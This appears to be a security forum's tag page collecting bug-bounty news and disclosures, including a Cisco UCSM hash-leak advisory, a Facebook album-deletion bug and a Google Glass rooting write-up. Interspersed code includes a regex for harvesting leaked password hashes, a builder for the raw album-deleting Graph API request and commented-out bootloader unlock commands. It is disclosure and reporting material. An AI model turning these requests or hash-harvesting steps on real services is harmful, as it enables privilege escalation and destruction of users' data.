Showing results for tags 'bug'.



Found 13 results

  1. I'm not sure I picked the right category, but I figured this is more of a beginner question (about bug bounty). Lately I've seen several examples of people/users saying they make a living entirely from bug bounty, and I wanted to ask whether it's really possible to earn a good income from bug bounty, and how much the time you put into it matters. Is it really something you can live off if you do it consistently, say like a 40-hour/week job? I mean specifically doing it to make a living, not out of passion/curiosity/interest. I'd really appreciate any examples you know of: friends/acquaintances/or even yourselves, people who have done or are doing this. Thanks!
  2. Hi, I want to share a playlist I've been following lately about bug bounty hunting. I recommend it to beginners and experienced hunters alike, because there is always something new to learn, or it may spark other ideas. Peter Yaworski, author of the book Web Hacking 101 (a "digest" of the most common vulnerability types, explained briefly and accompanied by examples discovered "in the wild" in recent years), runs a series of interviews with some of the best bug bounty hunters currently active, found at the top of the HackerOne and Bugcrowd leaderboards. In these interviews we learn how each of them got started, what methods and techniques they use, and much more. Every interview is different, and every guest has their own style and approach, so there is a lot to learn. Given that most of the targets they go after already have a security team behind them that finds the majority of issues, the ability to build creative, "outside the box" attacks is essential for finding critical problems in these systems. The playlist is here:
  3. Foxing the holes in the code: Mozilla has more than doubled the cash rewards under its dusty bug bounty, to beyond $10,000. The browser baron has increased the reward for high-severity bugs, such as those leading to remote code execution without requiring other vulnerabilities. Engineer Raymond Forbes says the bounty had not been updated in five years and had fallen out of step. "The amount awarded was increased to $3000 five years ago and it is definitely time for this to be increased again," Forbes says. "We have dramatically increased the amount of money that a vulnerability is worth [and] we are moving to a variable payout based on the quality of the bug report, the severity of the bug, and how clearly the vulnerability can be exploited. "Finally, we looked into how we decide what vulnerability is worth a bounty award." Mozilla previously awarded $3000 for critical vulnerabilities that could seriously endanger users. It paid small amounts for only some moderate vulnerabilities, which under the revamp will now attract up to $2000. The Firefox forger also launched its security bug hall of fame, a common and important component of bug bounty programs, and will open a version for its web properties and services. Bug bounties are enjoying a boom of late, with many large organisations opening in-house and outsourced programs to attract security vulnerability researchers. The schemes promise to improve the security posture of organisations while providing hackers with an opportunity to practice their skills and earn cash or prizes without the threat of legal ramifications. Programs must be properly set up prior to launch, including clear security policies and contact details posted to an organisation's web site, and strong communication between IT staff and bug hunters. Hackers will often drop unpatched vulnerabilities into the public domain if an organisation fails to respond or refuses to fix the bugs. Source
  4. Usr6

    The Bug

    https://www.sendspace.com/file/8q1lib

    The bug killers:
    1. @Byte-ul
    3.
    4.
    5.
  5. Security bod Kamil Hismatullin has disclosed a simple method to delete any video from YouTube. The Russian software developer and hacker found videos can be instantly nuked by sending the identity number of a video in a post request along with any token. Google paid the bug hunter US$5000 for the find along with $1337 under its pre-emptive vulnerability payment scheme in which it slings cash to help recognised researchers find more bugs. "I wanted to find there some CSRF or XSS issues, but unexpectedly discovered a logical bug that let me to delete any video on YouTube with just one request," Hismatullin says. "... this vulnerability could create utter havoc in a matter of minutes in [hackers'] hands who could extort people or simply disrupt YouTube by deleting massive amounts of videos in a very short period of time." Hismatullin says Google responded quickly when he reported the bug Saturday. He says he spent seven hours finding the bugs and resisted the near overwhelming urge to "clean up Bieber's channel". Google's Vulnerability Research Grants is described as cash with "no strings attached" that allows known security bods to apply for US$3133.70 to begin bug hunting expeditions. The search and service giant handed out some $1.5 million last year to bug hunters for reporting vulnerabilities Source+video
  6. Subject: Cisco UCSM username and password hashes sent via SYSLOG
     Impact: Information Disclosure / Privilege Elevation
     Vendor: Cisco
     Product: Cisco Unified Computing System Manager (UCSM)
     Notified: 2014.10.31
     Fixed: 2015.03.06 ( 2.2(3e) )
     Author: Tom Sellers ( tom at fadedcode.net )
     Date: 2015.03.21

     Description:
     ============
     Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 send local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster, each member will transmit the data.

     SYSLOG example ( portions of password hash replaced with <!snip!> ):

     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd
     Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd

     Vulnerable environment(s):
     ==========================
     Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment, including Fabric Interconnects, B-Series blade servers and the related blade chassis. C-Series (non-blade) servers can also be managed. These solutions are deployed in high performance / high density compute environments and allow for policy-based and rapid deployment of resources. They are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity.

     Software Versions: 1.3 - 2.2(1b)A
     Hardware: Cisco 6120 XP, 6296 UP
     SYSLOG Configuration:
     - Level: Information
     - Facility: Local7
     - Faults: Enabled
     - Audits: Enabled
     - Events: Disabled

     Risks:
     ======
     1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment, and this information represents an exposure.
     2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM.
     3. SYSLOG is transmitted in plain text.

     Submitter recommendations to vendor:
     ====================================
     1. Remove the username and password hash data from the SYSLOG output.
     2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system.
     3. Add support for TLS wrapped SYSLOG output.

     Vendor response/resolution:
     ===========================
     After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development, where it was treated as a standard bug. Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than that it was in progress with an undetermined release date. On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text:
     ---
     Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours.
     ---
     For several weeks a document related to this issue could be found on the Cisco Security Advisories, Responses, and Alerts site [1], but this has since been removed. Documents detailing similar issues [2] have been released, but none reference the Bug/Defect ID I was provided and the affected versions do not match.

     The following documents remain available:
     Public URL for Defect: https://tools.cisco.com/quickview/bug/CSCur54705
     Bug Search (login required): https://tools.cisco.com/bugsearch/bug/CSCur54705
     Release notes for 2.2(3e): http://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/release/notes/ucs_2_2_rn.html#21634

     Associated vendor IDs:
     PSIRT-1394165707
     CSCur54705

     Timeline:
     =========
     2014.10.30 Reported to psirt@cisco.com
     2014.11.04 Response from PSIRT, assigned PSIRT-1394165707
     2014.11.06 Follow up questions from Cisco, response provided same day
     2014.11.12 Status request. PSIRT responded that this had been handed to development and assigned defect id CSCur54705.
     2014.12.04 As PSIRT doesn't own the bug any longer, opened TAC case requesting status.
     2014.12.10 Response from Cisco TAC indicating that perhaps I should upgrade to the latest version at that time
     2014.12.12 Discussion with TAC, unable to gather required status update internally, TAC case closed with my permission
     2015.02.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.02.05 Sent status update request to PSIRT, response was that bug was fixed internally, release pending testing, release cycle, etc.
     2015.02.11 Follow up from Cisco to ensure that no additional information was required, closure of my request with my permission
     2015.02.13 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.04 Internal Cisco updates to the public bug document triggered email notification, no visible changes to public information
     2015.03.06 Update to public bug document, indicates that vulnerability is fixed in 2.2(3e)

     References:
     1 - http://tools.cisco.com/security/center/publicationListing.x
     2 - http://tools.cisco.com/security/center/viewAlert.x?alertId=36640 ( CVE-2014-8009 )

     Source
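The leaked lines in the advisory above follow a fixed format, so they are easy to spot mechanically in a syslog stream. Below is a minimal Python sketch of such a filter; the regex is derived from the sample lines quoted in the advisory, and the hash value in the sample data is an illustrative placeholder (the real hashes were snipped in the original report):

```python
import re

# Matches the "checking user:<name>,<hash>,..." payload that vulnerable
# UCSM versions emit via the securityd facility every 12 hours.
LEAK_RE = re.compile(
    r"%USER-6-SYSTEM_MSG: checking user:(?P<user>[^,]+),(?P<field>[^,]+),"
)

def find_leaked_hashes(syslog_lines):
    """Return (username, hash) pairs for crypt-style hashes leaked via syslog.

    A field of "!" means the account has no local password set, so only
    fields that look like crypt(3) hashes (starting with "$") are reported.
    """
    leaks = []
    for line in syslog_lines:
        m = LEAK_RE.search(line)
        if m and m.group("field").startswith("$"):
            leaks.append((m.group("user"), m.group("field")))
    return leaks

# Sample data modeled on the advisory's log excerpt; the hash is made up.
sample = [
    "Oct 28 23:31:37 host : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:admin,$1$Jabc71,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 host : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:samdme,!,-1.000000,16372.000000 - securityd",
]
print(find_leaked_hashes(sample))  # [('admin', '$1$Jabc71')]
```

Risk 2 in the advisory is exactly this filter run by an 'Operations'-role user: capture the pairs, feed them to a password cracker, and log in as Administrator.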
  7. Adobe has launched a bug bounty program that hands out high-fives, not cash. The web application vulnerability disclosure program, announced today and launched last month, operates through HackerOne, which is used by the likes of Twitter, Yahoo!, and CloudFlare, some of which provide cash or other rewards to those who disclose security messes. Adobe's program seeks out common flaws in its online services, including cross-site scripting; privileged cross-site request forgery; server-side code execution; authentication or authorisation flaws; injection vulnerabilities; directory traversal; information disclosure; and significant security misconfiguration. "In recognition of the important role that independent security researchers play in keeping Adobe customers safe, today Adobe launches a web application vulnerability disclosure program on the HackerOne platform," wrote Adobe security program manager Pieter Ockers. "Bug hunters who identify a web application vulnerability in an Adobe online service or web property can now privately disclose the issue to Adobe while boosting their HackerOne reputation score." Hackers will need to be the first to report a flaw and offer Adobe "reasonable" time to fix it prior to public disclosure, Ockers says. Smaller vulnerabilities are excluded, such as:
     - Logout and other instances of low-severity cross-site request forgery
     - Perceived issues with password reset links
     - Missing HTTP security headers
     - Missing cookie flags on non-sensitive cookies
     - Clickjacking on static pages
     The announcement comes as AirBnB this week launched its bug bounty on the popular HackerOne platform. Bug bounties work best when they offer cash, according to BugCrowd engineer Drew Sing. In vulnerability program guidelines published in July, he says money is the best incentive to encourage researchers to conduct more regular and intense testing of products and services. "A high priority security issue handled improperly could damage the reputation of the organisation ... the development, IT and communications team are all critical components to a successful program," Sing says. The managed bug service recommends that bounties be published in an obvious location on websites, preferably at a /security path, with a dedicated security contact who is well briefed in handling disclosures. So why has Adobe decided street cred, not cash, is the way to go? Wags might wonder if the company's infamously-porous products have so many bugs that a cash bounty could dent the bottom line. Source
  8. WordPress has become a huge target for attackers and vulnerability researchers, and with good reason. The software runs a large fraction of the sites on the Internet, and serious vulnerabilities in the platform have not been hard to come by lately. But there’s now a new bug that’s been disclosed in all versions of WordPress that may allow an attacker to take over vulnerable sites. The issue lies in the fact that WordPress doesn’t contain a cryptographically secure pseudorandom number generator. A researcher named Scott Arciszewski made the WordPress maintainers aware of the problem nearly eight months ago and said that he has had very little response. “On June 25, 2014 I opened a ticket on WordPress’s issue tracker to expose a cryptographically secure pseudorandom number generator, since none was present,” he said in an advisory on Full Disclosure. “For the past 8 months, I have tried repeatedly to raise awareness of this bug, even going as far as to attend WordCamp Orlando to troll^H advocate for its examination in person. And they blew me off every time.” The consequences of an attack on the bug would be that the attacker might be able to predict the token used to generate a new password for a user’s account and thus take over the account. Arciszewski has developed a patch for the problem and published it, but it has not been integrated into WordPress. Since the public disclosure, he said he has had almost no communication from the WordPress maintainers about the vulnerability, save for one tweet from a lead developer that was later deleted. Arciszewski said he has not developed an exploit for the issue but said that an attacker would need to be able to predict the next RNG seed in order to exploit it. “There is a rule in security: attacks only get better, never worse. If this is not attackable today, there is no guarantee this will hold true in 5 or 10 years.
Using /dev/urandom (which is what my proposed patch tries to do, although Stefan Esser has highlighted some flaws that would require a 4th version before it’s acceptable for merging) is a serious gain over a userland RNG,” he said by email. But, as he pointed out, this kind of bug could have a lot of value for a lot of attackers. “WordPress runs over 20% of websites on the Internet. If I were an intelligence agency (NSA, GCHQ, KGB, et al.) I would have a significant interest in hard-to-exploit critical WordPress bugs, since the likelihood of a high-value target running it as a platform is pretty significant. That’s not to say or imply that they knew about this flaw! But if they did, they probably would have sat on it forever,” Arciszewski said. WordPress officials did not respond to questions for this story before publication. Source
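The core of Arciszewski's complaint, predictable tokens coming out of a non-cryptographic RNG, can be illustrated in a few lines of Python. This is a sketch, not WordPress's actual code: the `weak_token`/`strong_token` functions and the token format are made up for illustration, but the seed-reuse attack is exactly the class of problem an OS CSPRNG such as /dev/urandom avoids:

```python
import random
import secrets

# Insecure: a userland PRNG like Mersenne Twister is fully determined by
# its seed, so an attacker who can predict or recover the seed can predict
# every "random" password-reset token it will ever produce.
def weak_token(seed):
    rng = random.Random(seed)
    return "".join(rng.choice("0123456789abcdef") for _ in range(32))

# Secure: secrets is backed by the OS CSPRNG (e.g. /dev/urandom), so the
# token cannot be reproduced even with full knowledge of the code.
def strong_token():
    return secrets.token_hex(16)

# The attack in miniature: same seed, same "random" token.
assert weak_token(1337) == weak_token(1337)
print(len(strong_token()))  # 32
```

If the reset token is the only thing standing between an attacker and an account, the difference between these two functions is the difference Arciszewski's patch was trying to make.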
  9. This week, a researcher named Laxman Muthiyah discovered a bug that let him delete any photo album on Facebook, and walked away with $12,500 for his trouble. The bug targeted Facebook's Graph API, which lets users delete their own photo albums with a single command, corresponding to the "delete album" button. Because of a mistake on Facebook's part, that request could potentially target any album on the network that the user had access to view, as long as the user was logged in through the mobile version of the API. After some troubleshooting, Muthiyah settled on the following request as the silver bullet for deleting any album off the network:

     DELETE /518171421550249 HTTP/1.1
     Host: graph.facebook.com
     Content-Length: 245

     access_token=facebook_for_android_access_token

     Muthiyah reported the vulnerability to Facebook and the company wrote back in just two hours, saying the bug was fixed and offering him $12,500 through Facebook's bug bounty program. Presumably, the fix was simple — altering the mobile app permissions was likely enough — but it's a reminder of how much damage even a small bug can do. Sophos has already speculated that the bug could have been used to delete every photo on Facebook, but such an attack would be unlikely, since the bug does not seem to have allowed for access to any private accounts. Luckily, Muthiyah did the right thing and reported the bug, walking away with a sizable reward. "We received a report about an issue with our Graph API and quickly fixed it within two hours of verifying the claims," said a Facebook representative. "We’d like to thank the researcher who reported the issue to us through our bug bounty program." Source: http://www.theverge.com/2015/2/12/8026159/facebook-photo-album-vulnerability-bug-bounty
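The capture quoted above can be rebuilt programmatically. This dry-run sketch only constructs the raw request string and sends nothing; the album id and token placeholder are the ones from the article, and Content-Length here is computed from the placeholder body rather than the 245 bytes of the original capture. The point it illustrates is that the server only checked that *a* valid token was supplied, not that it belonged to the album's owner:

```python
# Rebuild the single HTTP request behind the Graph API album-deletion bug,
# as a plain string (dry run only; nothing is sent anywhere).
def build_delete_request(album_id, access_token):
    body = "access_token=" + access_token
    return (
        "DELETE /{} HTTP/1.1\r\n"
        "Host: graph.facebook.com\r\n"
        "Content-Length: {}\r\n"
        "\r\n"
        "{}".format(album_id, len(body), body)
    )

req = build_delete_request("518171421550249", "facebook_for_android_access_token")
print(req.splitlines()[0])  # DELETE /518171421550249 HTTP/1.1
```

The fix on Facebook's side was the missing ownership check: the request format itself was working as designed.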
  10. HackerOne, the popular security response and bug bounty platform, rewarded a researcher with a $5,000 bounty for identifying a severe cross-site scripting (XSS) vulnerability. HackerOne hosts bug bounty programs for several organizations, but the company also runs a program for its own services. So far, HackerOne has thanked 54 hackers for helping the company keep its services secure, but Trello developer Daniel LeCheminant is the first to find a flaw rated “severe.” The researcher discovered that he could insert arbitrary HTML code into bug reports and other pages that use Markdown, a markup language designed for text-to-HTML conversions. “While being able to insert persistent, arbitrary HTML is often game over, HackerOne uses Content Security Policy (CSP) headers that made a lot of the fun stuff ineffective; e.g. I could insert a <script> tag or an element with an event handler, but it wouldn't run because these unsafe inline scripts were blocked by their CSP,” LeCheminant explained in a blog post. “Fortunately (for me) not all browsers have full support for CSP headers (e.g. Internet Explorer 11), so it wasn't hard to make a case that being able to run arbitrary script when someone attempted to view a bug that I'd submitted qualified as something that ‘might grant unauthorized access to confidential bug descriptions’,” he added. An attacker couldn’t have exploited the vulnerability to run arbitrary scripts in CSP-enforcing browsers, but as the expert demonstrated, the bug was serious enough. LeCheminant managed to change visual elements on the page (e.g. the color of links) because HackerOne’s CSP allows inline styles, and even to insert an image into his submission. According to the researcher, an attacker could have also inserted other elements, such as text areas, and could have redirected visitors of the page to an arbitrary website by using the meta refresh method.
When users click on links found in bug reports, they are redirected to a warning page where they are informed that they are about to leave HackerOne and visit a potentially unsafe website. However, by leveraging the XSS found by LeCheminant, a malicious actor could have bypassed the warning page and taken users directly to a potentially harmful site. The vulnerability was reported just three days ago and was resolved by HackerOne one day later. Source: securityweek.com
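The distinction LeCheminant exploited, inline scripts blocked but inline styles allowed, comes down to which CSP directives carry 'unsafe-inline'. HackerOne's real policy is not shown in the article, so the policy string below is a made-up stand-in that merely matches the behaviour described; the toy parser shows how a browser decides whether injected inline content runs:

```python
# Hypothetical policy matching the article's description: inline styles
# permitted, inline scripts not.
POLICY = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"

def parse_csp(policy):
    """Split a CSP header value into {directive: [source, ...]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0]] = tokens[1:]
    return directives

def inline_allowed(policy, directive):
    """Would inline content governed by this directive be allowed to run?

    Falls back to default-src when the directive is absent, as CSP does
    for fetch directives.
    """
    d = parse_csp(policy)
    sources = d.get(directive, d.get("default-src", []))
    return "'unsafe-inline'" in sources

print(inline_allowed(POLICY, "script-src"))  # False: injected <script> is blocked
print(inline_allowed(POLICY, "style-src"))   # True: recoloured links still work
```

A browser with no CSP support at all (the article's IE11 example) skips this check entirely, which is why the injected HTML was still judged severe.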
  11. Google is offering grants worth up to $3,000 to investigate suspected security flaws as a part of a new "experimental" initiative. Google security engineer Eduardo Vela Nava announced the move in a blog post, promising to offer further incentives for researchers to investigate suspected problems that they would otherwise ignore. "Today we're rolling out a new, experimental programme: Vulnerability Research Grants. These are upfront awards that we will provide to researchers before they ever submit a bug," he explained. "We'll publish different types of vulnerabilities, products and services for which we want to support research beyond our normal vulnerability rewards. "We'll award grants immediately before research begins, with no strings attached. Researchers then pursue the research they applied for, as usual. There will be various tiers of grants, with a maximum of $3,133.70." Google also announced plans to expand its existing bug bounty programme to include flaws in mobile applications. "Also starting today, all mobile applications officially developed by Google on Google Play and iTunes will now be within the scope of the Vulnerability Reward Programme," read the post. Google has been a constant supporter of bug bounty schemes, and announced reforms to its programmes in 2014. Google tripled Chrome bug bounty payments to $15,000 in October prior to launching the Project Zero initiative. Project Zero was launched in July 2014 with the apparent intention of speeding up companies' patch release schedules. The team of researchers does this by initially disclosing flaws privately to the firms responsible and giving them 90 days to release a fix before making the research public. The project was criticised earlier this year for the public disclosure of bugs in Microsoft's Windows and Apple's Mac OS X operating systems. Nava credited the schemes as a success despite the controversy. 
He revealed that Google paid researchers more than $1.5m for discovering over 500 bugs last year. Source
  12. A few days ago, I posted to Twitter a picture I took of a Google Glass unit running software that I had modified. I did this while in the Bay Area after picking it up from Google's headquarters in Mountain View. I was unable to provide many more details at the time, as I first was busy driving home, and then became caught up responding to a large amount of feedback caused by press surrounding my picture. My motivation for posting that picture was, in my mind, fairly simple: I have a large audience of users who are interested in device customization, particularly stemming from the idea of modifying the code of popular consumer devices (such as the iPhone). Some developers I work with had posted the night before that I was looking at Glass, and my post was an update on what I had done. The context for many reporters who saw what I posted was somewhat different, due to statements made by the Executive Chairman of Google the day before that Glass would be a relatively closed platform for developers. In contrast, engineers, developer advocates, and technical leads at Google have been trying to make it clear that Glass is designed to be an open platform. The result was difficult to navigate. In this article, I describe what I did, why I did it the way that I did it, and how people who own their own Glass can do the same thing. In the process, I explain the mechanism behind a security exploit in Android 4.0 that had been disclosed last September (this is the bug I used to modify Glass, not fastboot). Finally, I take a look at some important considerations on the security of this device that I find quite concerning. What is Google Glass? Glass is a new first-party hardware product designed by Google. It is a head-mounted computer that sits on your face very similarly to a pair of glasses (resting on your ears and your nose). It has a camera, a display, a touchpad (along the right arm), a speaker, and a microphone. 
The display is projected into your right eye using a prism, and sound is played into your eardrum from above your ear via bone conduction. While Glass looks very different from any other device, it runs an operating system that is now very common: Android. That said, it isn't quite the same as the Android that you see on phones and tablets: many of the higher-level applications are not present and have been replaced with the Glass UI (which is controlled by voice and gestures). (This is analogous to how the AppleTV runs a modified UI on top of iOS.) Glass costs $1500, but is not yet generally available. Currently, Glass is only available to a limited number of "early adopters" as part of something they call the "Glass Explorer Program". The device currently being sold is the "Glass Explorer Edition"; one would expect that Google will learn from peoples' reactions to it and make modifications for the final units put into general release. How did you get your hands on one? Recently, Google ran a contest on Twitter where people were asked to post messages using the hashtag #ifihadglass that had a cool idea for what they could do if they were given a device (winners were not just given a device, though: they still had to pay $1500, which according to an article published by Android and Me, many did not realize). (Sadly, as described in a post on Forbes, not all entries were very pleasant.) While my post on Twitter from a few days ago used the #ifihadglass hashtag (making a joke that "#ifihadglass I would jailbreak it and modify the software"), I had not ever actually entered this contest. I explain this, because at least a few people on Saturday thought that by posting that message (or by modifying the software on the device at all) I was violating the purpose and spirit of the competition. Instead, at Google I/O 2012, Google was allowing any attendee to "pre-order" one. 
While they couldn't accept your money that far in advance (a restriction enforced by credit card companies), attendees of the conference who signed up would be given the opportunity to buy one (for $1500) whenever it first became available, something Google expected to happen sometime in the next year (before I/O 2013). The one restriction was that you had to have a "business purpose", as they did not have the required FCC licenses in order to distribute the product to "consumers". They were not requiring you to use it for development, and I made it clear to them at the time that I did not intend to develop for the device normally. My business (SaurikIT) builds tools to modify software, and I'm always looking for more test devices. Can developers write apps for it? Yes: Google provides an official way to develop software for use with Glass (which they call "Glassware"): the "Mirror API". Unlike with other mobile devices (such as Android phones and tablets, or devices from Apple running iOS), software for Glass is not run on the device itself: instead, the developer is given access to a web-based API that allows them to integrate over the Internet with the user's Glass. Further, Eric Schmidt, the Executive Chairman of Google, as reported on Thursday in a release by Reuters, stated in a talk at Harvard that Google was intending to have a closed software ecosystem for Glass, where Google will have to pre-approve all software offered to users by developers. "It's so new, we decided to be more cautious," Schmidt said. "It's always easier to open it up more in the future." Looking back, two weeks ago Google released guidelines for developers of Glassware, which an article from the New York Times goes so far as to say "emulates Apple in restricting apps". "To begin, developers cannot sell ads in apps, collect user data for ads, share data with ad companies or distribute apps elsewhere. They cannot charge people to buy apps or virtual goods or services within them." 
It is this context that must then be kept in mind when reading the numerous articles that hit the press on Friday regarding my demonstration of a Glass running modified software: if you were wondering why the press ran so far and so hard, turning it into what seemed like a major story, it is because just the day before it had come straight from the top of Google that Glass would not be an open platform. Now, that said, Google generally likes open hardware, and it seems to me like Glass will not be an exception: at least the units currently being distributed as part of the early-access program have features (such as "Debug Mode") that demonstrate they are intended to be relatively-open devices. This was made clear by me to reporters I spoke with, and frankly the stories largely (but not entirely) got this right. What is the "Debug Mode" feature? So, when I picked up my unit, there were two "Glass Guides" who walked me through its use. At one point, they asked me to open Settings and select Bluetooth, so we could pair it with my iPhone. While there, I became curious about the "Device Information" menu, under which I found a setting "Debug Mode". The option had the Android logo next to it, and could be turned "on" and "off" (it was off). I asked the primary guide what it did (specifically asking whether it would give me access to the device via adb, the Android Debugging tool), and she told me that she wasn't certain; I believe she said that she hadn't seen that option before (although I don't quite remember; she may have just not known what adb was). I turned the feature on (of course), which seemed to make her somewhat uncomfortable. The second guide was slightly more technical, so when he returned a little later I asked him about the Debug Mode option. The reaction was interesting: he kind of looked at me, somewhat confused, and asked "wait, what version of the software does it report in Settings"? 
When I told him "XE4" he clarified "XE4, not XE3", which I verified. He had thought this feature had been removed from the production units. After a quick explanation that he must have not paid enough attention to the release notes, he told me that with Debug Mode enabled you could use a three-finger tap on the control area to file a bug report with the Glass team (while doing so, he demonstrated the action, which had a humorous result of him accidentally sending a bug report himself, which he then seemed somewhat abashed about). In fact, the Debug Mode option is the equivalent of the typical Android "Enable USB Debugging" option: it allows you to connect to the device over USB via adb. This tool allows you to manage the applications installed on the device, watch a detailed log of events occurring on the device, and get access to a shell (much like the Command Prompt on Windows, or even more closely, Terminal on Mac OS X). Some people stated that adb allows one to get full access to the device, particularly due to a few articles that mentioned a command "adb reboot-bootloader". In fact, adb itself is fairly restricted. What that command does is reboot the unit; when it boots back up, it starts into a special mode known as "fastboot". (On most Android devices, this is accomplished by holding down some buttons during boot.) What is fastboot (and "oem unlock")? The first piece of software that runs on devices like this is the "bootloader", a fairly small piece of software stored directly inside the device that has the job of loading the operating system that will be used and starting it. The default bootloader for Android provided by Google is called "fastboot". Some devices provide their own alternative bootloader; some of those support fastboot as a second option. When you boot in the fastboot mode, rather than continuing into the operating system, fastboot stops and makes itself available over USB. 
You can control the bootloader using a program provided by Google that is also called "fastboot". This allows low-level device access. (For people reading this from my iOS audience, it is reasonable to think of fastboot as the functional equivalent of "DFU mode".)

One of the commands available via fastboot is "oem", which allows manufacturers to provide custom commands; everything after "fastboot oem" is sent to the device without modification. By default, fastboot is "locked", and only a subset of the available commands can be used. Some devices provide oem commands that will unlock the bootloader (possibly requiring a password or other secret data). The most common command to unlock the bootloader is simply "unlock".

On most devices that provide this command, a menu will be displayed explaining that by unlocking the bootloader your warranty will be voided, and that the manufacturer recommends against it. It also has a side effect: it will delete all of your personal data stored on the device (I mention this in more detail later, and explain why). In order to enforce that your warranty has been voided (as well as to make it more clear to the user that something has changed), devices with unlocked bootloaders will also generally display some kind of image making this clear as the device boots. I like to call this image the "unlock of shame". I am not certain whether Glass has such an image, but I would presume it to be similar to other devices.

Once the bootloader is unlocked, you can use it to get full access to the device, in particular using "fastboot flash" to install different or modified operating systems. In a way, having access to an unlocked bootloader is the be-all-and-end-all of power. The things I wanted to accomplish require access to the "root" (administrator) account on the device, and fastboot is powerful enough to make that happen.
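For reference, the unlock-and-flash flow described above boils down to just a few commands. This is only a hedged sketch: it assumes the Android SDK platform-tools are installed, "modified-boot.img" is a placeholder name (not a real file), and the destructive commands are left commented out so nothing here actually unlocks or flashes anything.

```shell
# Sketch of the fastboot unlock/flash flow; requires a device rebooted into
# its bootloader (e.g. via "adb reboot-bootloader"). Destructive steps are
# commented out on purpose; "modified-boot.img" is a hypothetical filename.
if command -v fastboot >/dev/null 2>&1; then
  fastboot devices                       # lists devices currently in fastboot mode
  # fastboot oem unlock                  # DESTRUCTIVE: wipes user data, voids warranty
  # fastboot flash boot modified-boot.img  # only possible once unlocked
  fb_status="available"
else
  fb_status="missing"
  echo "fastboot not installed; commands shown for reference only"
fi
echo "fastboot on this machine: $fb_status"
```

The guard around `command -v fastboot` just keeps the sketch harmless to run on a machine without the Android SDK.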
However, I did not use fastboot; in fact, the bootloader on my device is still locked (and I would prefer not having to unlock it, for reasons more complex than "it would delete all of my data", which I also discuss in more detail later). Regardless, the truth of the matter is that while fastboot technically allows you to get root on Glass, as of Thursday night it was not an easy or viable option, for various reasons.

Why didn't you just use fastboot?

In order to get much value out of fastboot, you need to have an operating system "image" you can ask it to either store for later use or immediately boot. This image is similar to a bootable CD that you might place in your computer: it is a self-contained operating system. In the case of Linux, this will be a "kernel" (which includes any required device drivers) and, embedded inside of it, a filesystem.

In order to make one of these, you need a kernel that is compatible with the device. By far the easiest way to get a working kernel is to just dump one from a working device. However, fastboot doesn't actually provide this as a feature: you have to do it after the device has already booted, and that requires you to already have root access. In essence, this is a catch-22: we need root to get root.

Sometimes the manufacturer of a device provides a set of "stock images" (which is really convenient if you accidentally mess up your device: you can then easily restore it to a pristine from-the-manufacturer state via fastboot). This isn't as common as it should be, but Google normally does release stock images for all of their Google-branded devices; they have not, however, done so for Glass. They may very well do so later on.

The other option is to construct our own kernel: Linux is open source, so anyone can, without that much difficulty, compile their own from scratch.
However, you need to know what kinds of hardware components (both obvious things, such as the kind of CPU, and subtle things, like the model of the network card) the device is built out of, along with any other hardware-specific configuration information.

What kept you from building a kernel?

The easiest way to get this required information is to ask your device to provide it for you: Linux provides a way for the full configuration to be included in an easy-to-find manner (a virtual file, /proc/config.gz). Google, however, disabled this feature on Glass, so the fact that we have access to the device via adb is unhelpful for this purpose.

Alternatively, one can get this information from the manufacturer. It is actually a requirement that the manufacturer of a device using the Linux kernel provide this information (along with the full source code for the kernel, as modifications may have been made), but Google had not yet done this as of Friday morning (when I posted the picture of a modified Glass). It was not posted until Saturday (after which point many people didn't realize there had been a delay). This is actually quite common, and honestly I do not begrudge them at all for the delay: Apple is much worse about compliance, and only in a couple of cases have I ever felt the need to complain. In this case, according to someone from Google in charge of "open source compliance": "The GPL source should have been posted already (13 days ago, in fact), but it looks like the person who was to do it went on vacation first."

Of course, we could always attempt to guess-and-check our way to a compatible kernel, but this is hard and somewhat risky. I asked Koushik Dutta, the developer of ClockworkMod (a very popular recovery image used on rooted Android devices), if he had any tips on how to proceed in this situation; he said he "definitely wouldn't want to try to hack and slash at putting a kernel together for some random device".
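The /proc/config.gz check is easy to reproduce on any Linux machine: if the kernel was built with the CONFIG_IKCONFIG_PROC option, the full build configuration is one zcat away; otherwise the file simply does not exist, which is the situation described on Glass. A minimal probe, assuming nothing beyond a Linux system:

```shell
# Probe whether the running kernel exposes its own build configuration
# (the CONFIG_IKCONFIG_PROC feature that Google disabled on Glass).
if [ -r /proc/config.gz ]; then
  config_status="exposed"
  zcat /proc/config.gz | grep -c '^CONFIG_'   # number of enabled/declared options
else
  config_status="hidden"   # no config file: building a matching kernel gets much harder
fi
echo "kernel config: $config_status"
```

On a typical desktop distribution either outcome is possible; the point is only that when the answer is "hidden", the easy route to a compatible kernel is gone.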
